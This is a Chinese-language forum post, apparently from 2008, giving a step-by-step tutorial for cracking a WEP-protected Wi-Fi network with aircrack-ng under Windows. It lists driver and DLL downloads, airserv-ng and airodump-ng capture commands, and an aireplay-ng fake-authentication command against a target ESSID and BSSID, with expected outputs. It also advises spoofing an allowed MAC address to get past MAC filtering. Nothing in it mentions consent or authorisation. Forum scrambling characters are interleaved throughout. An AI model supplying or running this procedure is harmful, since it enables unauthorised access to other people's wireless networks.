上等兵
- 注册时间
- 2008-7-25
- 金币
- 63 个
- 威望
- 5 个
- 荣誉
- 0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
|
使用airrack和注射式攻击来破解WEPA首先你需要正确安装网卡驱动: 如果你的网卡不被commview支持的话,那么你需要安装wildpackets的驱动. , c" a F" o; Q9 L$ t) A
A1如果你的网卡被commview支持的话,那么点下面的地址下载驱动:8 W% g% W7 L0 p9 Y! N5 h% Y' [
http://www.tamos.com/bitrix/redirect.php?event1=download&event2=commwifi&event3=&goto=/files/ca5.zip
! _8 W6 k3 l& {& @, q/ wA2 如果不被commview支持的网卡则可以下载widpackets的驱动:$ ~1 a$ w& k; Z3 a. t
http://www.wildpackets.com/support/downloads/drivers L0 ~1 i& V( O' e& O" u
注意:下面的教程是在你正确安装commview的驱动的前提下进行的!# S1 _# O( `/ v) s7 i& c# ]/ t
B 你需要下载这个.dll文件(只适用于commview 的网友):
6 m& Q% _. o6 u% M% Bhttp://darkircop.org/commview.dll
( u+ i! z l7 j3 C, D2 d- S& f U
, M7 H4 H' p, o ]: e, |9 p0 y- WC 你需要下载aircrack 压缩包: http://dl.aircrack-ng.org/aircrack-ng-svn-win.zip ! M. b3 |+ H& a" R* q
) c# z& R$ M- o+ c" L% yD 解压aircrack 压缩包到你的任意硬盘根目录,在这里我是解压到c盘) _" n0 p' n n& g4 c
4 x7 m3 h. {- ^$ s' }/ k+ O4 {E 把B下载到的commview.dll 放到D解压的文件夹,应该放到目录c:\aircrack\9 o$ K( \" ^1 _ d. O! A
$ a: u9 y) h' A2 wF 去目录c:\program files\commview for wifi\(注意这个目录是安装完commview以后才会有,也就是A1你下载的文件),然后找到”ca2k.dll”文件,把”ca2k.dll”,拷贝到(c:\aircrack).
- t9 T0 P/ |( i9 I, Q( S% z, I/ L. K
当你完成以上准备以后,就可以开始正式的破解了!
" \1 R. V4 c4 E& ?2 I+ K原文提供的连接无法下载# ~" g: _$ j' n& H y- G$ u2 s
9 `* T9 w) ` m; y1 y+ s4 m
特提供以上文件的合成包供下载
: h8 p" q, Y X& t密码:password
6 k( {7 [5 z$ r! }5 G% `
/ K5 [ V# `( p, q6 O& z破解: 4 i3 S4 j! P# F+ g
1:打开一个命令提示符 (开始 > 运行 > cmd.exe)
4 ^ T& l3 |8 Q+ p, ]7 a' i' f
) j9 J6 O+ M1 b% M2:在命令提示符窗口下面输入:
8 N3 d' Y, A% k; |% m7 E r* I Cd c:\aircrack
+ z1 j9 r2 b. ^% _" M3 A# s-按下回车
* n. `0 J9 I. K2 S7 w1 Y+ z( g5 W
3 在命令相同的提示符窗口下面输入:
6 x+ ?6 c6 ^6 H/ ?3 D$ F2 q airserv-ng -d commview.dll2 P5 Y& A$ A+ W& L
-按下回车
' J* ]9 R( Y: S5 C0 b+ v你看到的回复应该跟下面一样:
; ]$ A7 t" J9 Z. T) q
3 `% r* Z, i7 b5 rOpening card commview.dll
- q2 B5 C P0 v CSetting chan 1
' x! U( W, Q( i# w2 b& fOpening sock port 666
1 }+ S! A. P! f& v0 [Serving commview.dll chan 1 on port 666
+ u" F9 P/ {/ L4 H1 b/ Y( E( o7 P# z
如果你没有看到上面的结果的话,而是看到下面的结果的话:
2 a+ A! P; m" a |$ r/ H. m; p+ W/ i$ [; [) w/ w }% Q$ d
注意这里可能会有两种情况出现!!!!!:: N T3 V# |& \. t3 v
: R. S4 Q+ d1 i+ ?: J
(1)
# }' M0 o+ N7 Y B% l" }9 O"Opening card commview.dll
1 ?6 o# Z# |0 o9 K8 xAdapter not found 0 h( K' P% Z4 w" p" T
get_guid() ! b! D& O$ h0 v+ y
airserv-ng: wi_open(): No error"
( ^. X! ^; d5 U/ D. E$ T7 S1 R0 G
( @0 j1 U5 r7 G这种情况那么你可以试试这个命令:) r4 y% M0 W4 E6 A6 d
. R% M5 M! u# m m% @( ^. n0 Mairserv-ng -d "commview.dll|debug"4 C/ I2 C; W1 U; H3 C5 |) @2 R
) P; y; P2 Q3 `9 x: _. \然后你可能会看到下面的结果
* h8 l' z" b4 B J8 z, P _# M3 M+ ~4 D E I6 x
Opening card commview.dll|debug * Z) g; u# H7 \
Name: [CommView] Proxim ORiNOCO 802.11b/g ComboCard Gold 8470
" j9 u/ x5 {* R* r% rget_guid: name: {15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg Co ) o( d5 o& e4 Q& y
mboCard Gold - Paketplaner-Miniport
/ z6 P& _6 B" |3 {8 f5 pAdapter not found % a- J }; w( L& C" |* \& f7 r
get_guid()
5 j k1 p# c2 Y, Oairserv-ng: wi_open(): No error
& P; r: V/ v, q7 x. M9 Z, k4 Y. D( J7 ^ d
那么你只要输入下面的命令就可以了
, Y/ `; }: M! H6 t: Q4 P; R- q. V1 f8 p& M1 }% E2 k
airserv-ng -d "commview.dll|{15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82}"7 @/ e" L, j) M. K1 E+ R
6 K _8 A6 H1 F4 P& x k( u; T
或者会自动搜寻网卡,然后提示你是不是这个网卡,然你远yes/no,那么你需要选择yes就可以了
z+ u0 y: A! O3 l: i9 y
- M' o& B, y6 A( @( ?- _3 L% b(2)
2 d" a P' s8 n$ j5 F7 ~5 b- `"Opening card commview.dll
' M7 S3 [' z2 ^9 kF1
; B( V5 U2 \6 e; P0 i" jinit_lib()
- m& o4 m6 o& ?9 f3 n8 O' {airserv-ng: wi_open(): No error"5 T! E0 }+ |, }. X9 K0 n
3 s0 y4 u2 N2 \ j
这种情况的话,那么你应该是由于安装了,windpackets 驱动而产生的问题,那么建议你安装commview 驱动,如果可能的话.
8 {9 Y: ]; ?! ^0 e/ a! a6 Q+ t3 e. N; Y+ q5 L/ }0 S
4. l5 i5 i$ L/ k& [+ ?/ J( `# l; W! I+ c
-注意现在重新开一个新的命令提示符窗口(我叫它窗口2),不要关掉前面的那个(窗口1)!!!
( L( i7 E2 {; G W7 Y& \2 ]-在窗口2输入命令如下:( m1 M$ _8 e, [% P) A
cd c:\aircrack\
" A( N2 ]$ G; p按回车8 F( S4 e* {2 N. s( K! U
f, x3 H3 y( Y
5
6 h' L! d- f2 z2 G P7 B-在窗口2输入命令如下:
: o" D" }) y9 e1 l% j) p airodump-ng 127.0.0.1:666' q+ I" C# P3 W6 w
回车. G$ w$ a b. ]# ~7 o
/ S# N( D, G! b; t2 X8 U提示: 如果你知道需要监视那个频道的话,那么你可以输入以下命令,我建议你这样做!!!:" q Y# u; e8 o. j9 {; [9 A
0 P# M5 b2 _" w
airodump-ng --channel 你的频道号 127.0.0.1:666 : T1 F0 j2 J5 D% `. Y2 o
比如说我需要监视的频道是6,那么命令如下1 V! |- L! d, B4 P2 B
1 ^- P) Y! k0 @% l& h airodump-ng --channel 6 127.0.0.1:666& `2 H6 q# }' x9 Q U
0 j3 N6 ~- I! E7 T J2 t; j% n
好了,现在airodump-ng 现在应该已经开始截取数据了,后面我们会使用注射式攻击来提高数据包的获取速度.3 v& H7 \" }, t( `' o# B
6 . u; ?( |' K2 o* b: B2 {
现在重新开一个新的命令提示符窗口(窗口3),不要关掉前面的(窗口1)和(窗口2)!!!
# }9 x) L; f% u& N$ N( M3 H-在窗口3输入命令如下:
: J5 H$ B7 Y6 E1 _6 E cd c:\aircrack\. E) p0 h+ T' D+ z# N: f
按回车
- J2 m) l# u" T7 H7 u7& o# b$ j' c$ M
在窗口3输入后面的命令:
: o* S! ^0 G0 e) L2 haireplay-ng -1 0 -e 你想破解网络的ESSID -a 你想破解网络的BSSID -h 你用来监视的网络的网卡MAC 127.0.0.1:6664 n' V4 ^8 t# M% K3 o2 E
实例:
* ]9 `% e/ L- @; oESSID = wifi16
- r* o; W6 y" j- o! |% Q9 v7 xBSSID = 11:22:33:44:55:66 8 P" s- P' \3 M7 |
MAC = 01:23:45:67:89:012 s& U" M$ j) S: O {: r+ }
提示:9 h: k, O; O; w! {/ Q
你想破解网络的ESSID = 破解网络的名字 (wifi16, mynetwork)- j w5 f0 N9 r+ ~
你想破解网络的BSSID = 破解网络的MAC (11:22:33:44:55:66)
2 f# Q4 f6 `. d( T* a你用来监视的网络的网卡MAC = 这个就是你的网卡MAC咯
. f* [# Y" r. l6 S. d那么命令行应该是:
* m' {3 Q4 Y: x* B# l$ |2 T# ?$ \aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:6661 b8 u! x, x! _
如果一切正常的话那么你会得到下面的回复:
% ~1 @$ o( { V5 y" G5 aSending Authentication Request * O3 Z) N. p" ~+ j
Authentication successful
$ n$ ^% a; o FSending Association Request * v5 R! ?, E2 V2 B' O
Association successful7 m2 {8 g4 M) J ~% J) X6 \
如果你得到:& E" n0 Z& Q7 e+ V" h8 J# w' J3 X
AP rejects the source MAC address9 Y5 g, o8 [; n. N- t3 ?+ q
这说明你破解的网络只允许特定的MAC 访问,那你你需要把你的MAC地址改成破解网络允许的地址.0 ^6 M( C9 ?$ A/ m1 l" o/ Z5 q
如果你持续得到:, _5 |$ s1 v! [, r$ M
sending authentication request
1 P" `* n$ M" M) v! g; z那么说明你离破解网络太远了,信号太弱,你需要离破解网络跟进一点,以获得更好的信号.
9 a ^4 {6 h" F0 g' W/ M x* k3 `; c. ?% v# g
[ 本帖最后由 fzulib 于 2008-9-5 16:01 编辑 ] |
评分
-
1
查看全部评分
-
|
IP卡
狗仔卡
发表于 2008-9-1 10:13
提升卡
置顶卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
